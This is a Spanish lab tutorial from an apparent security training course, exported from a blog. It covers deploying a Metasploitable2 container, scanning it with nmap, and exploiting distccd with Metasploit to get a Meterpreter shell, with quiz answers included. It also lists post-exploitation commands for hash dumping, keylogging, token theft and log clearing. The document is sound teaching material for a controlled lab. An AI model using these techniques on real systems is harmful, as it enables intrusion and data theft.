{"id":23497,"date":"2026-04-20T15:01:06","date_gmt":"2026-04-20T21:01:06","guid":{"rendered":"https:\/\/sada.services\/?p=23497"},"modified":"2026-04-23T16:09:34","modified_gmt":"2026-04-23T22:09:34","slug":"7-training-hub-i-vulnerabilities-analyst-pd-wrl-007-funciones-basicas-de-evaluacion-y-gestion-de-la-vulnerabilidad-metasploiting","status":"publish","type":"post","link":"https:\/\/sada.services\/?p=23497","title":{"rendered":"7. Training Hub I: Vulnerabilities Analyst \u2013 PD-WRL-007 | Funciones B\u00e1sicas de Evaluaci\u00f3n y Gesti\u00f3n de la Vulnerabilidad | Metasploiting"},"content":{"rendered":"\n

Para experimentar un poco con Metasploit, lo que haremos ser\u00e1 desplegar una imagen docker vulnerable en nuestra Kali Linux.<\/p>\n\n\n\n

Lo primero que habr\u00e1 que hacer es instalar docker. Para ello hay que seguir los siguientes pasos:<\/p>\n\n\n\n

1. Actualiza la lista de paquetes:<\/strong><\/p>\n\n\n\n

sudo su\napt update\napt upgrade<\/code><\/pre>\n\n\n\n
2. Instala los paquetes requeridos:<\/strong><\/p>\n\n\n\n
sudo apt install apt-transport-https ca-certificates curl gnupg-agent software-properties-common<\/code><\/pre>\n\n\n\n
3. A\u00f1ade la clave PGP de docker:<\/strong><\/p>\n\n\n\n
#obsoleto\ncurl -fsSL https:\/\/download.docker.com\/linux\/debian\/gpg | sudo apt-key add -\n\n# nuevo\nsudo mkdir -p \/etc\/apt\/keyrings\n\ncurl -fsSL https:\/\/download.docker.com\/linux\/debian\/gpg | \\\nsudo gpg --dearmor -o \/etc\/apt\/keyrings\/docker.gpg\n\nsudo chmod a+r \/etc\/apt\/keyrings\/docker.gpg<\/code><\/pre>\n\n\n\n
4. A\u00f1ade Docker al repositorio del sistema:<\/strong><\/p>\n\n\n\n
#obsoleto\nsudo add-apt-repository \"deb [arch=amd64] https:\/\/download.docker.com\/linux\/debian $(lsb_release -cs) stable\"\n\n# Nuevo\necho \\\n  \"deb [arch=$(dpkg --print-architecture) signed-by=\/etc\/apt\/keyrings\/docker.gpg] \\\n  https:\/\/download.docker.com\/linux\/debian \\\n  bookworm stable\" | \\\n  sudo tee \/etc\/apt\/sources.list.d\/docker.list > \/dev\/null<\/code><\/pre>\n\n\n\n
5. Actualiza la lista de los paquetes de nuevo:<\/strong> sudo apt update<\/em><\/p>\n\n\n\n
(Opcional) 6. Elimina las versiones obsoletas de Docker (en caso de tener algunas):<\/strong><\/p>\n\n\n\n
apt remove docker docker-engine docker.io<\/code><\/pre>\n\n\n\n
7. Instala docker:<\/strong><\/p>\n\n\n\n
sudo apt update\nsudo apt install docker-ce docker-ce-cli containerd.io -y<\/code><\/pre>\n\n\n\n
8. Verifica la instalaci\u00f3n correcta:<\/strong><\/p>\n\n\n\n
docker run hello-world<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Nota: <\/strong>si estas como root (lo puedes verificar introduciendo \u00abwhoami<\/em>\u00bb por terminal y verificando que te devuelve root) en vuestro sistema Kali (porque hayas introducido \u00absudo su<\/em>\u00bb por ejemplo antes de hacer los pasos de instalaci\u00f3n, no es necesario a\u00f1adir el sudo antes de los comandos).<\/p>\n\n\n\n
Una vez tenemos instalado docker, pasaremos a descargarnos la imagen vulnerable. Para ello introduciremos por terminal el comando:<\/p>\n\n\n\n
docker pull tleemcjr\/metasploitable2<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Tal y como vemos en la captura, como ya la ten\u00edamos descargada, notifica que la tenemos en la \u00faltima versi\u00f3n. A ti si es la primera vez que la descargas te saldr\u00e1n m\u00e1s mensajes.<\/p>\n\n\n\n
Una vez descargada la imagen, hay que ejecutarla en un contenedor y abrir y mapear los puertos. Para ello hay que ejecutar el comando:<\/p>\n\n\n\n
# Puerto 22 esta en uso \ndocker run -it -p 22:22 -p 80:80 -p 3306:3306 -p 445:445 -p 8080:8080 tleemcjr\/metasploitable2\n\n# usamos el 2222\ndocker run -it \\\n-p 2222:22 \\\n-p 80:80 \\\n-p 3306:3306 \\\n-p 445:445 \\\n-p 8080:8080 \\\ntleemcjr\/metasploitable2<\/code><\/pre>\n\n\n\n
Si la imagen empieza a desplegarse, te saldr\u00e1n mensajes parecidos al de la siguiente captura, terminando el proceso con acceso al contenedor creado.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Una vez tenemos acceso al mismo, introduciremos el comando ip a<\/em> para listar las interfaces del mismo y poder situar a nivel de red a nuestra m\u00e1quina vulnerable. Una vez sepamos la IP, dejaremos el terminal donde est\u00e1 el docker desplegado abierto y sin tocarlo, ya que si se cierra, estaremos cerrando el contenedor, por lo que para las pruebas habr\u00e1 que abrir un terminal secundario<\/strong>. Por otro lado, en nuestro caso, la m\u00e1quina vulnerable est\u00e1 situada en la IP 172.17.0.2, pero en tu caso puede diferir.
NOTA: esto nos logea dentro de la maquina por esto si hacemo ip a corre en el contenedor<\/p>\n\n\n\n
ip a<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Una forma de verificar que el contenedor est\u00e1 corriendo, es introduciendo el comando: (EN LA NUEVA TERMINAL)<\/p>\n\n\n\n
ssh kali@192.168.122.33\nsudo su\ndocker ps -a<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Una vez que sabemos que el mismo est\u00e1 desplegado (status Up), lo \u00fanico que nos falta verificar es que nuestra Kali tenga conectividad con la m\u00e1quina a atacar. Para ello podemos usar el comando:<\/p>\n\n\n\n
ping 172.17.0.2<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Que en nuestro caso ser\u00eda ping 172.17.0.2<\/em><\/strong>. Tal y como podemos ver en la imagen, tenemos conectividad y podremos empezar a hacer pruebas.<\/p>\n\n\n\n

Pregunta<\/strong><\/p>\n\n\n\n
\u00bfQu\u00e9 puertos comunes tiene abiertos la m\u00e1quina vulnerable?<\/strong><\/p>\n\n\n\n
Responde en orden ascendente.<\/em><\/p>\n\n\n\n
Ejemplo de respuesta: 1,4,90,578,900<\/em><\/p>\n\n\n\n
    \n
  • Para esto ejecutamos en la segunda terminal<\/li>\n<\/ul>\n\n\n\n
    nmap -p- -sV -sC 172.17.0.2<\/code><\/pre>\n\n\n\n
      \n
    • para local<\/li>\n<\/ul>\n\n\n\n
      nmap -p- -sV -sC localhost<\/code><\/pre>\n\n\n\n
      -p-<\/code> \u2192 escanea todos los puertos (1\u201365535)<\/strong><\/p>\n\n\n\n
      -sV<\/code> \u2192 detecta versiones <\/p>\n\n\n\n
      -sC<\/code> \u2192 scripts b\u00e1sicos<\/p>\n\n\n\n
        \n
      • Resultado<\/li>\n<\/ul>\n\n\n\n
        Starting Nmap 7.99 ( https:\/\/nmap.org ) at 2026-04-20 17:43 -0400\nNmap scan report for 172.17.0.2\nHost is up (0.0000020s latency).\nNot shown: 65510 closed tcp ports (reset)\nPORT      STATE SERVICE     VERSION\n21\/tcp    open  ftp         vsftpd 2.3.4\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 172.17.0.1\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      vsFTPd 2.3.4 - secure, fast, stable\n|_End of status\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n22\/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n| ssh-hostkey: \n|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)\n|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)\n23\/tcp    open  telnet      Linux telnetd\n25\/tcp    open  smtp        Postfix smtpd\n|_ssl-date: 2026-04-20T21:46:04+00:00; 0s from scanner time.\n|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN\n| ssl-cert: Subject: commonName=ubuntu804-base.localdomain\/organizationName=OCOSA\/stateOrProvinceName=There is no such thing outside US\/countryName=XX\n| Not valid before: 2010-03-17T14:07:45\n|_Not valid after:  2010-04-16T14:07:45\n| sslv2: \n|   SSLv2 supported\n|   ciphers: \n|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5\n|     SSL2_DES_64_CBC_WITH_MD5\n|     SSL2_RC2_128_CBC_WITH_MD5\n|     SSL2_DES_192_EDE3_CBC_WITH_MD5\n|     SSL2_RC4_128_EXPORT40_WITH_MD5\n|_    SSL2_RC4_128_WITH_MD5\n80\/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV\/2)\n|_http-title: Metasploitable2 - Linux\n|_http-server-header: Apache\/2.2.8 (Ubuntu) DAV\/2\n111\/tcp   open  rpcbind     2 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2            111\/tcp   rpcbind\n|   100003  2,3,4       2049\/tcp   nfs\n|   100003  2,3,4       2049\/udp   nfs\n|   100005  1,2,3      50419\/tcp   mountd\n|   100005  1,2,3      58275\/udp   mountd\n|   100021  1,3,4      33414\/tcp   nlockmgr\n|   100021  1,3,4      58022\/udp   nlockmgr\n|   100024  1          42939\/tcp   status\n|_  100024  1          49024\/udp   status\n139\/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n445\/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\n512\/tcp   open  exec        netkit-rsh rexecd\n513\/tcp   open  login\n514\/tcp   open  tcpwrapped\n1099\/tcp  open  java-rmi    GNU Classpath grmiregistry\n1524\/tcp  open  landesk-rc  LANDesk remote management\n2121\/tcp  open  ftp         ProFTPD 1.3.1\n3306\/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.0.51a-3ubuntu5\n|   Thread ID: 9\n|   Capabilities flags: 43564\n|   Some Capabilities: LongColumnFlag, ConnectWithDatabase, Support41Auth, Speaks41ProtocolNew, SupportsCompression, SupportsTransactions, SwitchToSSLAfterHandshake\n|   Status: Autocommit\n|_  Salt: RZPbz_L?5+x=fh[k,6k:\n3632\/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))\n5432\/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7\n| ssl-cert: Subject: commonName=ubuntu804-base.localdomain\/organizationName=OCOSA\/stateOrProvinceName=There is no such thing outside US\/countryName=XX\n| Not valid before: 2010-03-17T14:07:45\n|_Not valid after:  2010-04-16T14:07:45\n|_ssl-date: 2026-04-20T21:46:04+00:00; 0s from scanner time.\n5900\/tcp  open  vnc         VNC (protocol 3.3)\n| vnc-info: \n|   Protocol version: 3.3\n|   Security types: \n|_    VNC Authentication (2)\n6000\/tcp  open  X11         (access denied)\n6667\/tcp  open  irc         UnrealIRCd\n6697\/tcp  open  irc         UnrealIRCd\n8009\/tcp  open  ajp13       Apache Jserv (Protocol v1.3)\n|_ajp-methods: Failed to get a valid response for the OPTION request\n8180\/tcp  open  http        Apache Tomcat\/Coyote JSP engine 1.1\n|_http-favicon: Apache Tomcat\n|_http-server-header: Apache-Coyote\/1.1\n|_http-title: Apache Tomcat\/5.5\n8787\/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path \/usr\/lib\/ruby\/1.8\/drb)\n41515\/tcp open  java-rmi    GNU Classpath grmiregistry\nMAC Address: BE:5D:5B:77:E5:6C (Unknown)\nService Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: mean: 59m59s, deviation: 2h00m00s, median: 0s\n|_smb2-time: Protocol negotiation failed (SMB2)\n|_nbstat: NetBIOS name: B4E218382CFA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)\n| smb-os-discovery: \n|   OS: Unix (Samba 3.0.20-Debian)\n|   Computer name: b4e218382cfa\n|   NetBIOS computer name: \n|   Domain name: \n|   FQDN: b4e218382cfa\n|_  System time: 2026-04-20T17:45:56-04:00\n| smb-security-mode: \n|   account_used: <blank>\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 136.43 seconds<\/code><\/pre>\n\n\n\n
          \n
        • TOSO los Puertos abiertos<\/li>\n<\/ul>\n\n\n\n
          21,22,23,25,80,111,139,445,512,513,514,1099,1524,2121,3306,3632,5432,5900,6000,6667,6697,8009,8180,8787,41515<\/code><\/pre>\n\n\n\n
            \n
          • Pero como la pregunta dice puertos comunes serian estos<\/li>\n<\/ul>\n\n\n\n
            22,80,3306,445,8080<\/code><\/pre>\n\n\n\n
              \n
            • que son los que mapeamos en docker<\/li>\n<\/ul>\n\n\n\n
              \"\"<\/figure>\n\n\n\n
              \"\"<\/figure>\n\n\n\n
              Lo b\u00e1sico de Metasploit<\/h3>\n\n\n\n
              Ser\u00eda imposible hablar de hacking sin mencionar Metasploit<\/strong>. B\u00e1sicamente Metasploit es un framework de c\u00f3digo abierto desarrollado en Perl y Ruby enfocado al equipos de Read Team.<\/p>\n\n\n\n
              Es una herramienta muy completa que cuenta con:<\/p>\n\n\n\n
                \n
              • Much\u00edsimos\u00a0exploits<\/strong>, que son vulnerabilidades<\/strong> conocidas, en las cuales tienen tambi\u00e9n<\/li>\n\n\n\n
              • M\u00f3dulos, llamados\u00a0payloads<\/strong>, que son los c\u00f3digos que explotan estas vulnerabilidades.<\/strong><\/li>\n\n\n\n
              • Encoders<\/strong>, que son una especie de c\u00f3digos de cifrado para evasi\u00f3n de antivirus o sistemas de seguridad perimetral.<\/strong><\/li>\n<\/ul>\n\n\n\n
                Otra de las ventajas de este framework es que nos permite interactuar tambi\u00e9n con herramientas externas, como Nmap<\/strong><\/em> o Nessus<\/strong><\/em>.<\/p>\n\n\n\n
                En este laboratorio, vamos a utilizar Metasploit.<\/p>\n\n\n\n
                Para lanzarlo, abre una terminal de Linux y escribe msfconsole<\/em><\/p>\n\n\n\n
                msfconsole<\/code><\/pre>\n\n\n\n
                \"\"<\/figure>\n\n\n\n
                  \n
                • Para poder actualizarlo podemos lanzar el siguiente comando:\u00a0msfupdate<\/em><\/strong><\/li>\n<\/ul>\n\n\n\n
                  msfupdate<\/em><\/strong><\/code><\/pre>\n\n\n\n
                    \n
                  • NOTA: da este error ahora se instala con el sistema<\/li>\n<\/ul>\n\n\n\n
                    msfupdate is no longer supported when Metasploit is part of the operating\nsystem. Please use 'apt update; apt install metasploit-framework'\n<\/code><\/pre>\n\n\n\n
                    \"\"<\/figure>\n\n\n\n
                      \n
                    • Entonces para actualizar<\/li>\n<\/ul>\n\n\n\n
                      sudo apt update\nsudo apt install metasploit-framework -y\nsudo apt autoremove\nsudo apt upgrade -y<\/code><\/pre>\n\n\n\n
                        \n
                      • volvemos a ingresar<\/li>\n<\/ul>\n\n\n\n
                        msfconsole<\/code><\/pre>\n\n\n\n
                          \n
                        • Y si quieres saber la versi\u00f3n que tienes, puedes ejecutar este comando:\u00a0version<\/em>.<\/li>\n<\/ul>\n\n\n\n
                          version<\/em><\/code><\/pre>\n\n\n\n
                            \n
                          • Si utilizas \u00ab?<\/em><\/strong>\u00bb o \u00abhelp<\/strong><\/em>\u00ab, obtendr\u00e1s un listado de los comandos m\u00e1s frecuentes. Aqu\u00ed te lo dejamos m\u00e1s claros para que sepas como utilizarlos:<\/li>\n<\/ul>\n\n\n\n
                            show exploits\u200b<\/td>\u200bMostrar todos los exploits del Framework.<\/td><\/tr>
                            \u200bshow payloads<\/td>\u200bMostrar todos los payloads del Framework.<\/td><\/tr>
                            \u200bshow auxiliary<\/td>\u200bMostrar todos los m\u00f3dulos auxiliares del Framework.<\/td><\/tr>
                            \u200bsearch [cadena]<\/td>\u200bB\u00fasqueda por cadena<\/td><\/tr>
                            \u200bsearch type:[exploit, payload, auxiliary, encoder, post] [cadena]<\/td>\u200bB\u00fasqueda por tipo y cadena<\/td><\/tr>
                            \u200binfo\u200b<\/td>\u200bMuestra informaci\u00f3n acerca de un exploit cargado.<\/td><\/tr>
                            \u200buse [cadena]<\/td>\u200bCarga el exploit indicado.<\/td><\/tr>
                            \u200bLHOST\u200b<\/td>\u200bVariable local host<\/td><\/tr>
                            \u200bRHOST\u200b<\/td>\u200bVariable host remoto<\/td><\/tr>
                            \u200bset [par\u00e1metro] [valor]<\/td>\u200bGraba en el par\u00e1metro el valor indicado.<\/td><\/tr>
                            \u200bsetg[par\u00e1metro] [valor]<\/td>\u200bGraba en valor para el par\u00e1metro indicado de forma global.<\/td><\/tr>
                            \u200bshow options<\/td>\u200bMuestra las opciones de un exploit.<\/td><\/tr>
                            \u200bshow targets<\/td>\u200bMuestra las plataformas objetivo del exploit.<\/td><\/tr>
                            \u200bset target [n\u00famero]<\/td>\u200bEspecifica un objetivo concreto de los posibles.<\/td><\/tr>
                            \u200bset payload [payload]<\/td>\u200bEspecifica un payload a usar..<\/td><\/tr>
                            \u200bshow advanced<\/td>\u200bMuestra las opciones avanzadas.<\/td><\/tr>
                            \u200bset autorunscript migrate -f<\/td>\u200bMigra el proceso a un hilo independiente de forma autom\u00e1tica.<\/td><\/tr>
                            \u200bcheck\u200b<\/td>\u200bComprueba si un objetivo es vulnerable a un exploit.<\/td><\/tr>
                            \u200bexploit\u200b<\/td>\u200bEjecuta un exploit<\/td><\/tr>
                            \u200bexploit -j<\/td>\u200bEjecuta un exploit en background.<\/td><\/tr>
                            \u200bexploit -z<\/td>\u200bNo interact\u00faa con la sesi\u00f3n despu\u00e9s de acceder con \u00e9xito<\/td><\/tr>
                            \u200bexploit -e encoder<\/td>\u200bEspecifica el encoder a usar con el payload<\/td><\/tr>
                            \u200bexploit -h<\/td>\u200bMuestra la ayuda para el exploit especificado<\/td><\/tr>
                            \u200bsessions -l<\/td>\u200bMuestra la lista de sesiones disponibles<\/td><\/tr>
                            \u200bsessions -l -v<\/td>\u200bMuestra la lista de sesiones disponibles en modo verbose<\/td><\/tr>
                            \u200bsessions -s [script]<\/td>\u200bEjecuta un script espec\u00edfico en todas las sesiones de meterpreter activas.<\/td><\/tr>
                            \u200bsessions -K<\/td>\u200bMata todas las sesiones activas<\/td><\/tr>
                            \u200bsessions -c cmd<\/td>\u200bEjecuta un comando en todas las sesiones activas<\/td><\/tr>
                            \u200bsessions -u sessionID<\/td>\u200bActualiza una shell de Win32 a una consola de meterpreter<\/td><\/tr>
                            \u200bdb_create [nombre]<\/td>\u200bCrea una base de datos<\/td><\/tr>
                            \u200bdb_connect [nombre]<\/td>\u200bCrea y se conecta a una base de datos<\/td><\/tr>
                            \u200bdb_nmap<\/td>\u200bUsa y carga los resultados de Nmap en una base de datos<\/td><\/tr>
                            \u200bdb_autopwn -h<\/td>\u200bMuestra la ayuda para usar db_autopwn.<\/td><\/tr>
                            \u200bdb_autopwn -p -r -e<\/td>\u200bEjecuta db_autopwn contra todos los puertos encontrados, usa una shell reversa y los explota.<\/td><\/tr>
                            \u200bdb_destroy<\/td>\u200bElimina la actual base de datos<\/td><\/tr>
                            \u200bdb_destroy [usuario]:[contrase\u00f1a]@[host]:[puerto]\/[base_de_datos]<\/td>\u200bBorra una base de datos concret<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
                            Estudia esta tabla y familiar\u00edzate con estos comandos, ya que los usar\u00e1s mucho.<\/p>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            -sV<\/code> \u2192 Detecta versiones de servicios Adem\u00e1s de puertos abiertos, intenta identificar qu\u00e9 corre en cada uno (Apache, SSH, etc.)<\/p>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                            msfconsole -q<\/code><\/pre>\n\n\n\n
                            \"\"<\/figure>\n\n\n\n
                              \n
                            • Un modificador<\/strong> es un par\u00e1metro que le agregas a un comando para cambiar su comportamiento.<\/li>\n<\/ul>\n\n\n\n
                              Un ejemplo pr\u00e1ctico. Meterpreter<\/h3>\n\n\n\n
                              Siempre que se habla de Meterpreter<\/strong> son buenas noticias para el atacante. El meterpreter permite obtener una gran cantidad de informaci\u00f3n sobre una m\u00e1quina objetivo  comprometida.<\/p>\n\n\n\n
                              No es m\u00e1s que un int\u00e9rprete que permite interactuar con el objetivo (v\u00edctima) por medio de una serie de instrucciones directas que son f\u00e1ciles de recordar y sirven para llevar a cabo procesos de post-explotaci\u00f3n. La comunicaci\u00f3n entre el interprete meterpreter y la maquina remota es v\u00eda SSL, es decir que la informaci\u00f3n intercambiada entre las dos maquinas viaja cifrada, adem\u00e1s es posible utilizar m\u00faltiples canales de ejecuci\u00f3n, es decir, m\u00faltiples programas ejecut\u00e1ndose en la maquina remota y todos pueden ser manejados desde meterpreter con los comandos  \u00abchannel\u00bb y \u00abexecute\u00bb.<\/p>\n\n\n\n
                              Los comandos mas interesantes se listan a continuaci\u00f3n:<\/p>\n\n\n\n
                              \u200bhelp\u200b<\/td>\u200bMuestra la ayuda.<\/td><\/tr>
                              \u200brun [script]<\/td>\u200bEjecuta un script de meterpreter<\/td><\/tr>
                              \u200bsysinfo\u200b<\/td>\u200bMuestra la informaci\u00f3n del sistema comprometido<\/td><\/tr>
                              \u200bls\u200b<\/td>\u200bMuestra los ficheros y directorios del sistema comprometido<\/td><\/tr>
                              \u200buse priv<\/td>\u200bCarga librer\u00edas para elevar privilegios<\/td><\/tr>
                              \u200bps\u200b<\/td>\u200bMuestra los procesos en ejecuci\u00f3n<\/td><\/tr>
                              \u200bmigrate PID<\/td>\u200bMigra un proceso espec\u00edfico.<\/td><\/tr>
                              \u200buse incognito<\/td>\u200bCarga las librer\u00edas de inc\u00f3gnito.<\/td><\/tr>
                              \u200blist_tokens -u<\/td>\u200bMuestra los tokens disponibles por usuario<\/td><\/tr>
                              \u200blist_tokens -g<\/td>\u200bMuestra los tokens disponibles por grupo<\/td><\/tr>
                              \u200bimpersonate_token [dominio]\\\\[usuario]<\/td>\u200bApropiaci\u00f3n de un token disponible del objetivo.<\/td><\/tr>
                              \u200bsteal_token PID<\/td>\u200bApropiaci\u00f3n de un token disponible de un proceso dado<\/td><\/tr>
                              \u200bdrop_token<\/td>\u200bDeja de usar el token actual<\/td><\/tr>
                              \u200bgetsystem\u200b<\/td>\u200bIntenta elevar los privilegios del usuario de acceso.<\/td><\/tr>
                              \u200bshell\u200b<\/td>\u200bEjecuta una Shell interactiva<\/td><\/tr>
                              \u200bexecute -f cmd.exe -i<\/td>\u200bEjecuta cmd.exe e interact\u00faa con \u00e9l<\/td><\/tr>
                              \u200bexecute -f cmd.exe -i -t<\/td>\u200bEjecuta cmd.exe con todos los tokens disponibles<\/td><\/tr>
                              \u200bexecute -f cmd.exe -i -H -t<\/td>\u200bEjecuta cmd.exe con todos los tokens disponibles y lo convierte en un proceso oculto.<\/td><\/tr>
                              \u200brev2self<\/td>\u200bRetorna al usuario original que comprometi\u00f3 el sistema<\/td><\/tr>
                              \u200breg [comando]<\/td>\u200bEjecuta comandos en el registro del sistema comprometido<\/td><\/tr>
                              \u200bsetdesktop [n\u00famero]<\/td>\u200bCambia de pantalla<\/td><\/tr>
                              \u200bscreenshot\u200b<\/td>\u200bToma una captura de pantalla del objetivo<\/td><\/tr>
                              \u200bupload file<\/td>\u200bCarga un fichero en el objetivo<\/td><\/tr>
                              \u200bdownload file<\/td>\u200bDescarga un fichero del objetivo<\/td><\/tr>
                              \u200bkeyscan_start<\/td>\u200bComienza el sniffing del teclado.<\/td><\/tr>
                              \u200bkeyscan_dump<\/td>\u200bVuelca las teclas pulsadas del sistema objetivo.<\/td><\/tr>
                              \u200bkeyscan_stop<\/td>\u200bPara el sniffing del teclado.<\/td><\/tr>
                              \u200bgetprivs\u200b<\/td>\u200bIntenta elevar privilegios.<\/td><\/tr>
                              \u200buictl enable keyboard\/mouse<\/td>\u200bToma el control del teclado o rat\u00f3n.<\/td><\/tr>
                              \u200bbackground\u200b<\/td>\u200bSale de meterpreter sin cerrar la sesi\u00f3n.<\/td><\/tr>
                              \u200bhashdump\u200b<\/td>\u200bObtiene todos los hashes del objetivo.<\/td><\/tr>
                              \u200buse sniffer<\/td>\u200bCarga las librer\u00edas para esnifar.<\/td><\/tr>
                              \u200bsniffer_interfaces<\/td>\u200bLista los interfaces disponibles.<\/td><\/tr>
                              \u200bsniffer_dump [interfaceID] pcapname<\/td>\u200bComienza a esnifar un interfaz.<\/td><\/tr>
                              \u200bsniffer_start [interfaceID] packet-buffer<\/td>\u200bComienza a esnifar un rango espec\u00edfico.<\/td><\/tr>
                              \u200bsniffer_stats [interfaceID]<\/td>\u200bPara obtener estad\u00edsticas de la interfaz.<\/td><\/tr>
                              \u200bsniffer_stop interfaceID<\/td>\u200bDetiene el sniffer.<\/td><\/tr>
                              \u200badd_user [usuario] [contrase\u00f1a] -h [ip]<\/td>\u200bA\u00f1ade un usuario en el sistema objetivo.<\/td><\/tr>
                              \u200badd_group_user \u00abDomain Admins\u00bb [usuario] -h [ip]<\/td>\u200bA\u00f1ade un usuario al grupo de administradores en el sistema objetivo.<\/td><\/tr>
                              \u200bclearev\u200b<\/td>\u200bVac\u00eda el log de eventos del sistema comprometido<\/td><\/tr>
                              \u200btimestomp<\/td>\u200bCambia los atributos de un fichero.<\/td><\/tr>
                              \u200breboot\u200b<\/td>\u200bReinicia el sistema<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
                              Ahora vamos a dejar un ejempo pr\u00e1ctico en im\u00e1genes (no tienes que hacer nada), para que tengas una demostraci\u00f3n visual de su uso. Para ello, hemos desplegado un entorno vulnerable y lo hemos atacado.<\/p>\n\n\n\n
                              Al escanear la m\u00e1quina con nmap, descubrimos el puerto 3632 donde se ejecuta un servicio distccd, el cual es un servicio de software que distribuye tareas de compilaci\u00f3n entre otras m\u00e1quinas participantes. Vamos a ver si tiene alguna vulnerabilidad. \u00bfSe te ocurre c\u00f3mo?<\/p>\n\n\n\n
                              \"\"<\/figure>\n\n\n\n
                              Podemos buscar en internet o preguntar a\u00a0 metasploit qu\u00e9 vulnerabilidad hay asociada con ese servicio usando el comando\u00a0search<\/em><\/strong>.execute -f cmd.exe -i -t<\/p>\n\n\n\n
                              search distccd<\/code><\/pre>\n\n\n\n
                              \"\"<\/figure>\n\n\n\n
                              Ahora vamos a usar dicho exploit con el comando use. Simplemente debemos escribir la ruta completa desde\u00a0exploit\/unix\/misc\/distcc_exec<\/em>. Tal como se muestra en la siguiente captura:<\/p>\n\n\n\n
                              use exploit\/unix\/misc\/distcc_exec<\/code><\/pre>\n\n\n\n
                              \"\"<\/figure>\n\n\n\n
                                \n
                              • Y ver sus opciones<\/li>\n<\/ul>\n\n\n\n
                                show options<\/code><\/pre>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                Luego ejecutamos \u00abshow options<\/em><\/strong>\u00bb ya que cada exploit debe de configurarse con los par\u00e1metros correctos. En este caso los campos\u00a0RPORT<\/em>\u00a0y\u00a0RHOSTS<\/em>\u00a0que son el puerto e IP remoto (v\u00edctima) son campos obligatorios a rellenar (required a yes), por lo que lo establecemos con el comando set a los valores adecuados.\u00a0
                                <\/p>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                Una vez que tenemos todo listo, simplemente escribimos\u00a0run<\/em><\/strong>\u00a0o\u00a0exploit<\/strong><\/em>.<\/p>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                Tal como se puede apreciar en la captura, ya tenemos un meterpreter v\u00e1lido dentro de la m\u00e1quina atacada. Por lo que si escribimos,\u00a0shell<\/em><\/strong>, obtendremos una consola muy sencilla, con la que poder probar algunos comandos b\u00e1sicos. Al escribir \u00abexit<\/em><\/strong>\u00bb nos vamos de la consola, y volvemos al meterpreter donde podemos seguir ejecutando comandos de meterpreter (como por ejemplo el comando\u00a0\u00absysinfo<\/em><\/strong>\u00bb para obtener informaci\u00f3n del sistema).<\/p>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                  \n
                                • \u00bfQu\u00e9 comando intenta elevar los privilegios del usuario de acceso?<\/strong><\/li>\n\n\n\n
                                • \u200bgetsystem<\/li>\n<\/ul>\n\n\n\n
                                  \"\"<\/figure>\n\n\n\n
                                  \"\"<\/figure>\n\n\n\n
                                  \"\"<\/figure>\n\n\n\n
                                  \"\"<\/figure>\n\n\n\n
                                  Atacando el servicio FTP<\/h3>\n\n\n\n
                                  En el paso 1 pudiste comprobar con nmap que hay un servicio ftp ejecut\u00e1ndose en el puerto 21<\/strong>. <\/p>\n\n\n\n
                                  Intenta explotarlo con Metasploit con los conocimientos que se te han dado previamente.<\/p>\n\n\n\n
                                    \n
                                  • En una terminal<\/li>\n<\/ul>\n\n\n\n
                                    docker run -it \\\n-p 2222:22 \\\n-p 80:80 \\\n-p 3306:3306 \\\n-p 445:445 \\\n-p 8080:8080 \\\ntleemcjr\/metasploitable2<\/code><\/pre>\n\n\n\n
                                      \n
                                    • En la otra<\/li>\n<\/ul>\n\n\n\n
                                      nmap -p- -sV -sC 172.17.0.2<\/code><\/pre>\n\n\n\n
